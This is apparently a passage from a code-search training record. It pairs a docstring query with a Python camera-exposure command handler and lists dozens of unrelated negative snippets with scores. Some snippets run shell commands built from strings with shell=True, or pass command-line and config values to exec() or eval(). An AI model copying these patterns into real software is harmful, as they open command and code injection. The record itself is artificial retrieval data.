delay_unit)\n\n if 'delay-distro' in options:\n \n if 'delay-distro_unit' in options and options['delay-distro_unit'] in ['usec', 'msec', 'sec', 'min']:\n delay_dist_unit = options['delay-distro_unit']\n else:\n delay_dist_unit = 'msec'\n\n if not delay_set:\n return \"Error: delay distribution can only be set with the delay\", 400\n tcset_options.append('--delay-distro ' + str(options['delay-distro']) + delay_dist_unit)\n\n # settings without units (percentage)\n if 'loss' in options and 0 <= options['loss'] <= 100: # | ||\n tcset_options.append('--loss ' + str(options['loss']) + '%') # | |_\n\n if 'corrupt' in options and 0 <= options['corrupt'] <= 100:\n tcset_options.append('--corrupt ' + str(options['corrupt']) + '%')\n\n if 'reorder' in options and 0 <= options['reorder'] <= 100:\n if not delay_set:\n return \"Error: reordering can only be set with the delay\", 400\n tcset_options.append('--reordering ' + str(options['reorder']) + '%')\n\n if 'duplicate' in options and 0 <= options['duplicate'] <= 100:\n tcset_options.append('--duplicate ' + str(options['duplicate']) + '%')\n\n if not len(tcset_options):\n return 'Error: no settings were given', 400\n\n # print('[ TCSET OPTIONS ]', tcset_options, sep='\\n', end='\\n')\n\n # print('[ c_id ]', c_id, sep='\\n', end='\\n')\n\n cmd = 'tcdel --docker --all {0};\\ntcset --docker {1} {0}'.format(c_id, ' '.join(tcset_options))\n\n # print('[ CMD ]', cmd, sep='\\n', end='\\n')\n\n\n tcset_process = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, universal_newlines=True,\n timeout=25)\n\n return_code = tcset_process.returncode\n stdout = tcset_process.stdout\n stderr = tcset_process.stderr\n\n # print('[ returncode ] ', return_code)\n # print('[ stdout ]', stdout, sep='\\n')\n # print('[ stderr ]', stderr, sep='\\n')\n\n # return redirect(url_for('show_container', c_id=c_id))\n\n return return_code", "def configure(self,user_input):\n if user_input==\"configure formal\":\n self.configure_formality(True)\n elif user_input==\"configure informal\":\n self.configure_formality(False)\n elif user_input==\"configure delay\":\n self.configure_delay(2)\n elif user_input==\"configure no delay\":\n self.configure_delay(0)\n '''\n #%%\n '''", "def set_params(self, **kargs):\n\n # may further modify parameters manually\n if len(kargs) > 0:\n for key in kargs:\n if key in self.params[self.profile].keys():\n self.params[self.profile][key] = kargs[key]\n else:\n print '%s not a standard key. Will not be used.' % (key)\n \n self.pathout = self.params[self.profile]['pathout']\n self.chans = self.params[self.profile]['chans']\n self.dmarr = self.params[self.profile]['dmarr']\n self.pulsewidth = self.params[self.profile]['pulsewidth'] * n.ones(len(self.chans))\n self.approxuvw = self.params[self.profile]['approxuvw']\n self.beam_params = self.params[self.profile]['beam_params']\n self.long = self.params[self.profile]['long']\n self.lat = self.params[self.profile]['lat']", "def run(self, args=[]):\n # Assert correct configuration.\n assert self.c.cbb.config, 'An empty configuration was specified.'\n assert self.c.cbb.builddir, 'A build directory name must be specified.'\n\n # Load properties from the commit being processed. This requires both a\n # repository and revision to proceed.\n repository = self.m.properties.get('repository')\n revision = self.m.properties.get('revision')\n if repository and revision:\n # Pull more information from the commit if it came from certain known\n # repositories.\n if (self.c.use_chrome_version and\n self.check_repository('chromium', repository)):\n # If our change comes from a Chromium repository, add the\n # '--chrome_version' flag.\n self.c.cbb.chrome_version = self.m.properties['revision']\n if (self.c.read_cros_manifest and\n self.check_repository('cros_manifest', repository)):\n # This change comes from a manifest repository. Load configuration\n # parameters from the manifest command.\n self.load_manifest_config(repository, revision)\n\n buildroot = self.m.path['root'].join('cbuild', self.c.cbb.builddir)\n cbb_args = [\n '--buildroot', buildroot,\n ]\n if not args:\n cbb_args.append('--buildbot')\n if self.c.chromite_branch and not self.c.cbb.disable_bootstrap:\n cbb_args.extend(['--branch', self.c.chromite_branch])\n if self.c.cbb.build_number is not None:\n cbb_args.extend(['--buildnumber', self.c.cbb.build_number])\n if self.c.cbb.chrome_rev:\n cbb_args.extend(['--chrome_rev', self.c.cbb.chrome_rev])\n if self.c.cbb.debug:\n cbb_args.extend(['--debug'])\n if self.c.cbb.clobber:\n cbb_args.extend(['--clobber'])\n if self.c.cbb.chrome_version:\n cbb_args.extend(['--chrome_version', self.c.cbb.chrome_version])\n if self.c.cbb.config_repo:\n cbb_args.extend(['--config_repo', self.c.cbb.config_repo])\n if self.c.repo_cache_dir and self.c.cbb.supports_repo_cache:\n cbb_args.extend(['--repo-cache', self.c.repo_cache_dir])\n\n # Set the build ID, if specified.\n if self.c.cbb.build_id:\n cbb_args.extend(['--master-build-id', self.c.cbb.build_id])\n\n # Add custom args, if there are any.\n cbb_args.extend(args)\n\n # Run cbuildbot.\n return self.cbuildbot(str('cbuildbot [%s]' % (self.c.cbb.config,)),\n self.c.cbb.config,\n args=cbb_args,\n cwd=self.m.path['slave_build'])", "def _SetRunParameters(self, params: Mapping[str, Any]) -> None:\n # Ideally YCSB should be refactored to include a function that just takes\n # commands for a run, but that will be a large refactor.\n FLAGS['ycsb_run_parameters'].unparse()\n FLAGS['ycsb_run_parameters'].parse([f'{k}={v}' for k, v in params.items()])", "def definearguments(self, customparser):\n\n customparser.add_option(\n '--disable',\n action=\"store_false\",\n dest=\"enableFeature\",\n help=\"Disable the Scalable Persistent Memory feature. Warning: \"\\\n \"any pending configuration changes will be lost.\"\n )", "def set_parameters(self,params):\n K3Supervisor.set_parameters(self,params)\n self.blending.set_parameters(self.parameters)", "def configure(self, *args):\n raise NotImplementedError(self, \"configure\")", "def _ApplyFlags(cls, config_values, flag_values):\n super(ContainerRegistrySpec, cls)._ApplyFlags(config_values, flag_values)\n if flag_values['cloud'].present or 'cloud' not in config_values:\n config_values['cloud'] = flag_values.cloud\n if flag_values['container_cluster_cloud'].present:\n config_values['cloud'] = flag_values.container_cluster_cloud\n updated_spec = {}\n if flag_values['project'].present:\n updated_spec['project'] = flag_values.project\n if flag_values['zone'].present:\n updated_spec['zone'] = flag_values.zone[0]\n cloud = config_values['cloud']\n cloud_spec = config_values.get('spec', {}).get(cloud, {})\n cloud_spec.update(updated_spec)\n config_values['spec'] = {cloud: cloud_spec}", "def paraChck(**kwargs):\n import sys\n\n \n def_val = {\n 'x_train':None,\n 'y_train':None,\n 'x_test':None,\n 'y_test':None,\n 'channel':1,\n 'input_img_cols':72,\n 'input_img_rows':72,\n 'nb_classes':13,\n 'nb_epoch': 5,\n 'batch_size' : 16,\n 'dict_label' : None} # default parameteters value\n\n diff = set(kwargs.keys()) - set(def_val.keys())\n if diff:\n print(\"Invalid args:\",tuple(diff),file=sys.stderr)\n return\n\n def_val.update(kwargs)\n return def_val", "def commit_settings(self, param):\n try:\n if param.name() == 'kinesis_lib':\n try:\n sys.path.append(param.value())\n clr.AddReference(\"Thorlabs.MotionControl.DeviceManagerCLI\")\n clr.AddReference(\"Thorlabs.MotionControl.IntegratedStepperMotorsCLI\")\n clr.AddReference(\"Thorlabs.MotionControl.GenericMotorCLI\")\n import Thorlabs.MotionControl.IntegratedStepperMotorsCLI as Integrated\n import Thorlabs.MotionControl.DeviceManagerCLI as Device\n import Thorlabs.MotionControl.GenericMotorCLI as Generic\n Device.DeviceManagerCLI.BuildDeviceList()\n serialnumbers = [str(ser) for ser in\n Device.DeviceManagerCLI.GetDeviceList(Integrated.CageRotator.DevicePrefix)]\n\n except:\n serialnumbers = []\n self.settings.child(('serial_number')).setOpts(limits=serialnumbers)\n\n elif param.name() == 'polling_time':\n self.controller.StopPolling()\n QThread.msleep(500)\n self.controller.StartPolling(self.settings.child(('polling_time')).value())\n QThread.msleep(500)\n self.emit_status(ThreadCommand('update_main_settings', [['wait_time'], param.value(), 'value']))\n\n\n except Exception as e:\n self.emit_status(ThreadCommand('Update_Status', [getLineInfo() + str(e), 'log']))", "def set_distr_options(args):\n global distr_options\n distr_options = {}\n\n distr_options['error_distribution_domain'] = error_distribution_domain\n distr_options['seg_N'] = seg_N\n distr_options['seg_kappa'] = seg_kappa\n distr_options['nonlinear_solver'] = nonlinear_solver\n distr_options['non_negativity_constraint_distributions'] = \\\n non_negativity_constraint_distributions\n distr_options['probability_constraint_of_distributions'] = \\\n probability_constraint_of_distributions", "def set_attributes(self, argv):\n if argv[0] == \"population\" or argv[0] == \"pop\":\n if argv[1] == \"ttl\":\n self.population[int(argv[2])].ttl = int(argv[3])", "def main(arguments=None):\n ########## IMPORTS ##########\n ## STANDARD LIB ##\n ## THIRD PARTY ##\n ## LOCAL APPLICATION ##\n import dryxPython.commonutils as dcu\n\n ## ACTIONS BASED ON WHICH ARGUMENTS ARE RECIEVED ##\n # PRINT COMMAND-LINE USAGE IF NO ARGUMENTS PASSED\n if arguments == None:\n arguments = docopt(__doc__)\n\n # UNPACK SETTINGS\n if \"--settingsFile\" in arguments and arguments[\"--settingsFile\"]:\n import yaml\n stream = file(arguments[\"--settingsFile\"], 'r')\n settings = yaml.load(stream)\n stream.close()\n # SETUP LOGGER -- DEFAULT TO CONSOLE LOGGER IF NONE PROVIDED IN SETTINGS\n if 'settings' in locals() and \"logging settings\" in settings:\n log = dl.setup_dryx_logging(\n yaml_file=arguments[\"--settingsFile\"]\n )\n elif \"--logger\" not in arguments or arguments[\"--logger\"] is None:\n log = dl.console_logger(\n level=\"DEBUG\"\n )\n log.debug('logger setup')\n\n # unpack remaining cl arguments using `exec` to setup the variable names\n # automatically\n for arg, val in arguments.iteritems():\n varname = arg.replace(\"--\", \"\")\n if isinstance(val, str) or isinstance(val, unicode):\n exec(varname + \" = '%s'\" % (val,))\n else:\n exec(varname + \" = %s\" % (val,))\n if arg == \"--dbConn\":\n dbConn = val\n log.debug('%s = %s' % (varname, val,))\n\n ## START LOGGING ##\n startTime = dcu.get_now_sql_datetime()\n log.info(\n '--- STARTING TO RUN THE git_update_script.py AT %s' %\n (startTime,))\n\n # call the worker function\n # x-if-settings-or-database-credientials\n if \"git repos\" in settings:\n for repo in settings[\"git repos\"]:\n log.debug('repo[\"path\"]: %s' % (repo[\"path\"],))\n log.debug('repo[\"branchToUpdate\"]: %s' % (repo[\"branchToUpdate\"],))\n update_git_repos(\n log=log,\n gitProjectRoot=repo[\"path\"],\n branchToUpdate=repo[\"branchToUpdate\"]\n )\n\n ## FINISH LOGGING ##\n endTime = dcu.get_now_sql_datetime()\n runningTime = dcu.calculate_time_difference(startTime, endTime)\n log.info(\n '-- FINISHED ATTEMPT TO RUN THE git_update_script.py AT %s (RUNTIME: %s) --' %\n (endTime, runningTime, ))\n\n return", "def process_args(args, multiple_chrs=False, tool_name=\"\"):\r\n # Retrieves the dataset.\r\n dataset, chrom, tool = None, None, None\r\n\r\n dataset = DATASETS.get(args.dataset, None)\r\n if not dataset:\r\n print \"Unknown dataset %s.\" % args.dataset\r\n return dataset, chrom, tool\r\n dataset.set_work_dir(args.path)\r\n\r\n # Retreieves the Chromosome(s).\r\n if multiple_chrs:\r\n chrom = [dataset.get_chr(chr_num) for chr_num in args.chrs]\r\n else:\r\n chrom = dataset.get_chr(args.chr)\r\n\r\n # Retrieves the tool.\r\n if tool_name:\r\n full_name = get_tool(tool_name)\r\n if not full_name:\r\n return dataset, chrom, tool\r\n tool = TOOLS[full_name]\r\n tool.set_work_dir(args.path)\r\n\r\n return dataset, chrom, tool", "def bcp_set(self, **kwargs):\n pass", "def _handle_arguments(self, args):\n super()._handle_arguments(args)\n\n # The device display serial\n self.display_device_serial = self.config.get(\n 'DisplayDevice', 'DisplayDeviceSerialUSBName', fallback=None\n )\n\n # Read Analytics Tracking ID\n self.analytics_tracking_id = self.config.get(\n 'Analytics', 'tracking_id', fallback=None\n )", "def _set_version(args: Any):\n if args['msc']:\n version = 'msc'\n elif args['nx']:\n version = 'nx'\n elif args['optistruct']:\n version = 'optistruct'\n elif args['nasa95']:\n version = 'nasa95'\n elif args['mystran']:\n version = 'mystran'\n else:\n version = None\n args['version'] = version\n del args['msc'], args['nx'], args['nasa95'], args['mystran'], args['optistruct']", "def modify_args(args):\n \n if args['voxel_path'] is None:\n args['voxel_path'] = args['stitched_prefix'] + \"0.mrc\"\n mrc = mrcfile.open(args['voxel_path'])\n args['voxel_size'] = float(mrc.voxel_size.x) # Angstrom / pixel\n mrc.close()\n\n args['params'] = pickle.load(open(args['params'], \"rb\"))\n\n if args['exclude_angles'] is None:\n args['exclude_angles'] = np.array(list())\n\n return args", "def cmd_cdup(args):", "def update_args(self, args):\n for cfg in args:\n keys, v = cfg.split(\"=\", maxsplit=1)\n keylist = keys.split(\".\")\n dic = self\n # print(keylist)\n if len(keylist) == 1:\n assert keylist[0] in dir(dic), \"Unknown config key: {}\".format(\n keylist[0]\n )\n for i, k in enumerate(keylist[:-1]):\n assert k in dir(dic), \"Unknown config key: {}\".format(k)\n dic = getattr(dic, k)\n key = keylist[-1]\n assert key in dir(dic), \"Unknown config key: {}\".format(key)\n oldv = getattr(dic, key)\n if not isinstance(oldv, str):\n v = eval(v)\n setattr(dic, key, v)", "def configure(args):\n print('Configures HPC fleet with given name \"{}\"'.format(args))", "def set_params(self, params):", "def update_args(self, args):\n for cfg in args:\n keys, v = cfg.split('=', maxsplit=1)\n keylist = keys.split('.')\n dic = self\n for i, k in enumerate(keylist[:-1]):\n assert k in dir(dic), \"Unknown config key: {}\".format(keys)\n dic = getattr(dic, k)\n key = keylist[-1]\n oldv = getattr(dic, key)\n if not isinstance(oldv, str):\n v = eval(v)\n setattr(dic, key, v)", "def set_params(self, **kwargs):\n\n kw_keys = list(kwargs)\n\n if 'alpha' in kw_keys:\n self.alpha = kwargs['alpha']\n\n if 'beta' in kw_keys:\n self.beta = kwargs['beta']\n\n if 'gamma' in kw_keys: \n \tself.gamma = kwargs['gamma']\n\n if 'epsilon' in kw_keys:\n self.epsilon = kwargs['epsilon']\n \n self.nact = self.highbound-self.lowbound\n self.actions = np.arange(self.nact)", "def _set_credentials(args):\n if hasattr(args, 'username') and hasattr(args, 'apikey') \\\n and args.username and args.apikey:\n config.update({'username': args.username})\n config.update({'apikey': args.apikey})\n elif os.path.exists(os.path.expanduser('~/.jarvice.cfg')):\n CParser = configparser.ConfigParser()\n CParser.read([os.path.expanduser('~/.jarvice.cfg'), ])\n config.update({'username': CParser.get('auth', 'username')})\n config.update({'apikey': CParser.get('auth', 'apikey')})\n else:\n sys.stderr.write(\"username and apikey must be passed as arguments \" \n \"or set in ~/.jarvice.cfg\")\n sys.exit(1)", "def configAll(self,set,*args,**kwargs):\n # update first the params dictionary with any parameters passed to the function \n self.updateParameters(*args,**kwargs)\n # create ctypes objects for all the python typed parameters in the the dictionary params, to be passed to the C DLL.\n clock = c_int32(self._params[\"clock\"])\n trig = c_int32(self._params[\"trigSource\"])\n trig_coupling = c_int32(self._params[\"trigCoupling\"])\n trig_slope = c_int32(self._params[\"trigSlope\"])\n trig_level1 = c_double(self._params[\"trigLevel1\"])\n trig_level2 = c_double(self._params[\"trigLevel2\"])\n trig_delay = c_double(self._params[\"trigDelay\"])\n mem = c_int32(int(self._params[\"memType\"]))\n configMode=c_int32(int(self._params[\"configMode\"]))\n converters_per_channel=c_int32(self._params[\"convertersPerChannel\"])\n used_channels = c_int32(self._params[\"usedChannels\"])\n sample_interval = c_double(self._params[\"sampleInterval\"])\n number_of_points = c_int32(self._params[\"numberOfPoints\"])\n number_of_segments = c_int32(self._params[\"numberOfSegments\"])\n numberOfBanks = c_int32(self._params[\"numberOfBanks\"])\n fs=zeros(self.nbrOfChannels,dtype=float64)\n of=zeros(self.nbrOfChannels,dtype=float64)\n cs=zeros(self.nbrOfChannels,dtype=int32)\n bs=zeros(self.nbrOfChannels,dtype=int32)\n for i in range(0,self.nbrOfChannels):\n fs[i]=self._params[\"fullScales\"][i]\n of[i]=self._params[\"offsets\"][i]\n cs[i]=self._params[\"couplings\"][i]\n bs[i]=self._params[\"bandwidths\"][i] \n time_us=myType(0,float64) \n dataArraySize=c_int32(0)\n timeArraySize=c_int32(0)\n # call the ConfigAll DLL function that configures all the acquisition parameters\n status = self.__acqiris_QuantroDLL1.ConfigAll(\n c_bool(set)\n ,self.__instrumentID\n ,byref(clock)\n ,byref(used_channels)\n ,byref(converters_per_channel)\n ,byref(mem)\n ,byref(sample_interval)\n ,byref(number_of_points)\n ,byref(number_of_segments)\n ,byref(numberOfBanks)\n ,byref(trig)\n ,byref(trig_coupling)\n ,byref(trig_slope)\n ,byref(trig_level1)\n ,byref(trig_level2)\n ,byref(trig_delay)\n ,byref(configMode)\n ,byref(dataArraySize)\n ,byref(timeArraySize)\n ,fs.ctypes.data \n ,of.ctypes.data \n ,cs.ctypes.data \n ,bs.ctypes.data\n ,time_us.address()\n ,c_bool(True)\n ) \n self.transformErr2Str(status)\n # update dictionary params by converting back ctyped data in python\n # because params dictionary has to be kept always up to date \n self._params[\"clock\"]=clock.value\n self._params[\"trigSource\"]=trig.value\n self._params[\"trigCoupling\"]=trig_coupling.value\n self._params[\"trigSlope\"]=trig_slope.value\n self._params[\"trigLevel1\"]=trig_level1.value\n self._params[\"trigLevel2\"]=trig_level2.value\n self._params[\"trigDelay\"]= trig_delay.value\n self._params[\"memType\"]=mem.value\n self._params[\"configMode\"]=configMode.value\n self._params[\"convertersPerChannel\"]=converters_per_channel.value\n self._params[\"usedChannels\"]=used_channels.value\n self._params[\"sampleInterval\"]=sample_interval.value\n self._params[\"numberOfPoints\"]=number_of_points.value\n self._params[\"numberOfSegments\"]=number_of_segments.value\n self._params[\"numberOfBanks\"]=numberOfBanks.value\n for i in range(0,self.nbrOfChannels):\n self._params[\"fullScales\"][i]=float(fs[i])\n self._params[\"offsets\"][i]=float(of[i])\n self._params[\"couplings\"][i]=int(cs[i])\n self._params[\"bandwidths\"][i]=int(bs[i])\n self.dataArraySize=dataArraySize.value # This is the data array size required for a raw data transfer\n self.timeArraySize=timeArraySize.value # This is the time array size required for timestamps and horPositions\n # self.notify(\"parameters\",self._params) # possible notification to a Frontpanel \n return status", "def __init__(self, *args, **kwargs):\n _gdi_.DCPenChanger_swiginit(self,_gdi_.new_DCPenChanger(*args, **kwargs))", "def setEnableCondition(*args):" ]
[ "0.7167858", "0.60452235", "0.60324895", "0.5878222", "0.57493514", "0.5714063", "0.56342685", "0.56257355", "0.5574821", "0.5573054", "0.55587506", "0.55421853", "0.55330527", "0.55330527", "0.55330527", "0.55330527", "0.55330527", "0.55182", "0.5511414", "0.55045736", "0.5467105", "0.54632825", "0.54624164", "0.5453541", "0.5450035", "0.54375243", "0.5430262", "0.5427062", "0.5421712", "0.5416249", "0.5409233", "0.53626144", "0.5356093", "0.53518593", "0.5341914", "0.53287685", "0.53205323", "0.5306304", "0.5291827", "0.5266918", "0.52517205", "0.52418184", "0.5241179", "0.5233229", "0.52232593", "0.522301", "0.5212935", "0.521246", "0.5211139", "0.5198409", "0.51920295", "0.5191129", "0.5184949", "0.5163929", "0.51605237", "0.51605237", "0.51605237", "0.51605237", "0.51605237", "0.5156189", "0.5156053", "0.51532376", "0.51515496", "0.5148168", "0.5147214", "0.51384366", "0.5131453", "0.51312524", "0.512232", "0.51180476", "0.5117403", "0.5112216", "0.5111987", "0.51078975", "0.5097551", "0.50892955", "0.508914", "0.50842303", "0.50772274", "0.50757766", "0.5070307", "0.5069131", "0.5065604", "0.5060312", "0.505138", "0.504097", "0.50384307", "0.5030067", "0.5027108", "0.50217646", "0.50185156", "0.5017288", "0.5011161", "0.5010678", "0.5000946", "0.49964997", "0.4992266", "0.49915817", "0.4988403", "0.4983168" ]
0.528423
39
Determines what to do with the incoming data, whether it is sending an exposure command or setting a parameter. This is a separate method from handle_client() because it is called as a new thread, so ensure the exposure is nonblocking.
def handle_command(log, writer, data): response = 'BAD: Invalid Command' commandList = data.split() try: if commandList[0] == 'expose': if len(commandList) == 3: if commandList[1] == 'light' or commandList[1] == 'dark' or commandList[1] == 'flat': expType = commandList[1] expTime = commandList[2] try: float(expTime) if float(expTime) > 0: expTime = float(expTime) fileName = exposure(expType, expTime) response = 'OK\n'+'FILENAME = '+fileName else: response = 'BAD: Invalid Exposure Time' except ValueError: response = 'BAD: Invalid Exposure Time' elif len(commandList) == 2: if commandList[1] == 'bias': expType = commandList[1] try: fileName = exposure(expType, 0.0) response = 'OK\n'+'FILENAME: '+fileName except ValueError: response = 'BAD: Invalid Exposure Time' elif commandList[0] == 'set': if len(commandList) >= 1: response = setParams(commandList[1:]) except IndexError: response = 'BAD: Invalid Command' # tell the client the result of their command & log it #log.info('RESPONSE = '+response) #writer.write((response+'\n---------------------------------------------------\n').encode('utf-8')) writer.write((response+'\nDONE\n').encode('utf-8'))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def command(self):\n saw_error = False\n try:\n analog_gain = float(self.value_analog.get())\n except:\n print(\"analog must be floating point value\")\n self.value_analog.set(str(self.tcp_comms.tcp_params.analog_gain_target))\n saw_error = True\n try:\n digital_gain = float(self.value_digital.get())\n except:\n print(\"digital must be floating point value\")\n self.value_digital.set(str(self.tcp_comms.tcp_params.digital_gain_target))\n saw_error = True\n try:\n analog_tol = float(self.value_analog_tol.get())\n except:\n print(\"analog tol must be floating point value\")\n self.value_analog_tol.set(str(self.tcp_comms.tcp_params.analog_gain_tol))\n saw_error = True\n try:\n digital_tol = float(self.value_digital_tol.get())\n except:\n print(\"digital tol must be floating point value\")\n self.value_digital_tol.set(str(self.tcp_comms.tcp_params.digital_gain_tol))\n saw_error = True\n if not saw_error:\n self.tcp_comms.tcp_params.analog_gain_target = analog_gain\n self.tcp_comms.tcp_params.digital_gain_target = digital_gain\n self.tcp_comms.tcp_params.analog_gain_tol = analog_tol\n self.tcp_comms.tcp_params.digital_gain_tol = digital_tol\n self.tcp_comms.send_freeze_exposure(analog_gain, analog_tol, digital_gain, digital_tol)", "async def handle_client(reader, writer):\n\n request = None\n \n # loop to continually handle incoming data\n while request != 'quit': \n request = (await reader.read(255)).decode('utf8')\n print(request.encode('utf8'))\n #log.info('COMMAND = '+request)\n writer.write(('COMMAND = '+request.upper()+'\\n').encode('utf8')) \n\n response = 'BAD'\n # check if data is empty, a status query, or potential command\n dataDec = request\n if dataDec == '':\n break\n elif 'status' in dataDec.lower():\n response = 'OK'\n # check if the command thread is running\n try:\n if exposureState() > 0:\n response = response + '\\nBUSY'\n else:\n response = response + '\\nIDLE'\n except:\n response = response + '\\nIDLE'\n\n if ccd_frame[0].s == PyIndi.ISS_ON:\n frameType = 'LIGHT'\n elif ccd_frame[1].s == PyIndi.ISS_ON:\n frameType = 'BIAS'\n elif ccd_frame[2].s == PyIndi.ISS_ON:\n frameType = 'DARK'\n elif ccd_frame[3].s == PyIndi.ISS_ON:\n frameType = 'FLAT'\n\n response = response+\\\n '\\nBIN MODE = '+str(ccd_bin[0].value)+'x'+str(ccd_bin[1].value)+\\\n '\\nCCD TEMP = '+str(ccd_temp[0].value)+\\\n 'C\\nLAST FRAME TYPE = '+str(frameType)+\\\n '\\nFILE DIR = '+str(fileDir)+\\\n '\\nLAST IMAGE = '+str(imgName)\n\n # send current status to open connection & log it\n #log.info('RESPONSE: '+response)\n writer.write((response+'\\nDONE\\n').encode('utf-8'))\n \n elif 'stop' in dataDec.lower():\n # check if the command thread is running\n try:\n if comThread.is_alive():\n response = 'OK: aborting exposure'\n ccd_abort[0].s=PyIndi.ISS_ON \n indiclient.sendNewSwitch(ccd_abort)\n blobEvent.set() #Ends the currently running thread.\n response = response+'\\nExposure Aborted'\n else:\n response = 'OK: idle'\n except:\n response = 'OK: idle'\n\n # send current status to open connection & log it\n #log.info('RESPONSE = '+response)\n writer.write((response+'\\nDONE\\n').encode('utf-8'))\n\n else:\n # check if the command thread is running, may fail if not created yet, hence try/except\n try:\n if comThread.is_alive():\n response = 'BAD: busy'\n # send current status to open connection & log it\n #log.info('RESPONSE = '+response)\n writer.write((response+'\\nDONE\\n').encode('utf-8'))\n else:\n # create a new thread for the command\n comThread = threading.Thread(target=handle_command, args=(log, writer, dataDec,))\n comThread.start()\n except:\n # create a new thread for the command\n comThread = threading.Thread(target=handle_command, args=(log, writer, dataDec,))\n comThread.start()\n\n await writer.drain()\n writer.close()", "def got_data(self, data):\n if self.get_current_state() == SBE37ProtocolState.DIRECT_ACCESS:\n # direct access mode\n if len(data) > 0:\n mi_logger.debug(\"SBE37Protocol._got_data(): <\" + data + \">\") \n if self._driver_event:\n self._driver_event(DriverAsyncEvent.DIRECT_ACCESS, data)\n # TODO: what about logging this as an event?\n return\n \n if len(data)>0:\n # Call the superclass to update line and prompt buffers.\n CommandResponseInstrumentProtocol.got_data(self, data)\n \n # If in streaming mode, process the buffer for samples to publish.\n cur_state = self.get_current_state()\n if cur_state == SBE37ProtocolState.AUTOSAMPLE:\n if SBE37_NEWLINE in self._linebuf:\n lines = self._linebuf.split(SBE37_NEWLINE)\n self._linebuf = lines[-1]\n for line in lines:\n self._extract_sample(line)", "def _pve_control_cb(self, msg):\n self._data_available = True\n self._cmd = msg.data", "def _on_stdin_read(self, data):\n if not self.opts[\"udp\"]:\n self.fire(write(data))\n else:\n self.fire(write((self.host, self.port), data))", "def handleRecvData(self, data):\n\n\t\t#Look for commands\n\t\tif data == 'Hello':\n\t\t\t#Inform client it is 'connected'\n\t\t\tself.transmit(\"Welcome\")\n\n\t\telif data == 'kill':\t\n\t\t\t#Stop the server running\n\t\t\tself.running = False\n\n\t\telif data == 'control':\n\t\t\t#Print out if in control of car\n\t\t\tprint(\"Control query\")\n\t\t\tif self.arduino:\n\t\t\t\t#print(self.address)\n\t\t\t\tself.transmit(\"Control: True\")\n\t\t\telse:\n\t\t\t\t#print(self.address)\n\t\t\t\tself.transmit(\"Control: False\")\n\n\t\telif data == 'Hello?':\n\t\t\t#The client is still alive therefore set missing count to 0\n\t\t\tself.missingCount = 0\n\n\t\t#Look for Arduino Data\n\t\telif self.arduino:\n\t\t\t#Check if controlling the car and it's a valid car command\n\t\t\tif self.arduino.readPack(data): \n\t\t\t\tprint(self.address)\n\t\t\t\tprint(\"Sent to arduino: %s\" % data)\n\t\t\telse:\n\t\t\t\t#Print out other data\n\t\t\t\tprint(\"Not valid Arduino data\")\n\t\t\t\tprint(self.address)\n\t\t\t\tprint(data)\n\n\t\telse:\n\t\t\t#All other data print out\n\t\t\tprint(self.address)\n\t\t\tprint(data)", "def _handleIncomingDataAnalysis(self, msg: str):\n\t\tlogging.info(\"[CDA_CALLBACK]----->>>The _handleIncomingDataAnalysis method is being called\")\n\t\tad = DataUtil.jsonToActuatorData(self, msg)\n\t\tself.actuatorAdapterManager.sendActuatorCommand(ad)", "def _send_device_command(self, requested_state, requested_data):\n if requested_state:\n if requested_data is not None:\n self._brightness = int(requested_data)\n\n self._tellcore_device.dim(self._brightness)\n else:\n self._tellcore_device.turn_off()", "def data_received(self, data):\n # This may seem strange; feeding all bytes received to the **writer**,\n # and, only if they test positive, duplicating to the **reader**.\n #\n # The writer receives a copy of all raw bytes because, as an IAC\n # interpreter, it may likely **write** a responding reply.\n self._last_received = datetime.datetime.now()\n\n cmd_received = False\n for byte in data:\n try:\n recv_inband = self.writer.feed_byte(bytes([byte]))\n except:\n self._log_exception(logger.warning, *sys.exc_info())\n else:\n if recv_inband:\n # forward to reader (shell).\n self.reader.feed_data(bytes([byte]))\n\n # becomes True if any out of band data is received.\n cmd_received = cmd_received or not recv_inband\n\n # until negotiation is complete, re-check negotiation aggressively\n # upon receipt of any command byte.\n if not self._waiter_connected.done() and cmd_received:\n self._check_negotiation_timer()", "def communicate():\n pass", "def _async_process_data(self):\n _LOGGER.debug(\"Update switch called\")\n\n data = self._api.get_device_data(self._dev_id)\n\n if not data:\n _LOGGER.error(\"Received no data for device %s\", self._name)\n self.async_write_ha_state()\n return\n\n if \"relay\" in data:\n self._is_on = data[\"relay\"]\n\n self.async_write_ha_state()", "def _jsonCmdCallback(self, data):\n self.serverSemaphore.acquire()\n\n logging.debug(\"MenuMain: req = {}\".format(data))\n\n #check mandatory fields for each JSON request\n method = None\n jsonId = None\n params = None\n\n\n for attribute in data:\n if attribute == \"method\":\n method = data['method']\n elif attribute == \"id\":\n jsonId = data['id']\n elif attribute == \"params\":\n params = data['params']\n\n logging.debug(\"MenuMain: method = {} | id = {} | params = {}\".format(method, jsonId, params))\n\n if jsonId is None or method is None:\n logging.debug(\"MenuMain: jsonId or Method not defined in request\")\n msg = \"id and/or method not defined in request\"\n resp = _jsonErrResponse(jsonId, -1, msg)\n method = \"None\" # make sure no execution happens in the next steps\n\n if method in jsonHandler:\n resp = jsonHandler[method](jsonId, params)\n\n elif \"Input.\" in method:\n tmp = method.split('.')\n if len(tmp) == 2:\n resp = jsonHandler[\"Input\"](jsonId, tmp[1])\n else:\n msg = \"Input function not defined properly\"\n resp = _jsonErrResponse(jsonId, ERR_VALUE, msg)\n elif method == \"IshaPi.SetProperty\":\n if 'value' in data:\n resp = jsonHandler['IshaPi.ScreenSaver'](jsonId, data['value'])\n else:\n msg = \"IshaPi Property has no value....\"\n resp = _jsonErrResponse(jsonId, ERR_VALUE, msg)\n\n else:\n logging.debug(\"MenuMain: json handler not found\")\n msg = \"method not found....\"\n resp = _jsonErrResponse(jsonId, ERR_METHOD_NOT_FOUND, msg)\n\n self.serverSemaphore.release()\n return resp", "def _async_process_data(self):\n data = self._api.get_device_data(self._dev_id)\n\n if not data:\n _LOGGER.error(\"Received no data for device %s\", self._name)\n self.async_write_ha_state()\n return\n\n if \"relay\" in data:\n self._is_on = data[\"relay\"]\n\n self.async_write_ha_state()", "def handle_data(self, data_type, data_size, socket, data):\n return self.game.process_exnternal_request(socket, data_type, data_size, data)", "def data_received(self, transport, line):\n\n if transport not in self.clients:\n return\n\n client = self.clients[transport]\n log.debug(f'{client} << {line!r}')\n\n try:\n func_name, *args = line.split()\n except ValueError:\n return\n func = getattr(IncomingCommand, func_name, None)\n\n # Dispatch and handle errors\n try:\n if func is None:\n raise UnknownCommand(func_name)\n if 